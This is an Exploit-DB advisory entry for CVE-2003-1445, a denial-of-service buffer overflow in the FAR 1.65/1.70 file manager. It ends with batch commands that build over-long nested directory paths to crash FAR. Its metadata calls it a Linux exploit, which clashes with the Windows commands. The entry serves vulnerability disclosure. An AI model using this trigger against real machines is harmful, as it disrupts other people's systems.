RARLAB FAR 1.65/1.70 File Manager Buffer Overflow Vulnerability

2003-02-11T00:00:00
ID EDB-ID:22243
Type exploitdb
Reporter 3APA3A
Modified 2003-02-11T00:00:00

Description

RARLAB FAR 1.65/1.70 File Manager Buffer Overflow Vulnerability. CVE-2003-1445. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/6822/info

A buffer overflow vulnerability has been reported for FAR that may result in a denial of service condition. The vulnerability exists due to insufficient bounds checking performed by FAR when parsing directory paths. Specifically, when FAR attempts to parse overly long paths it will crash thereby resulting in a denial of service condition. 

SET A=A<260 chars>A
SET B=BBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\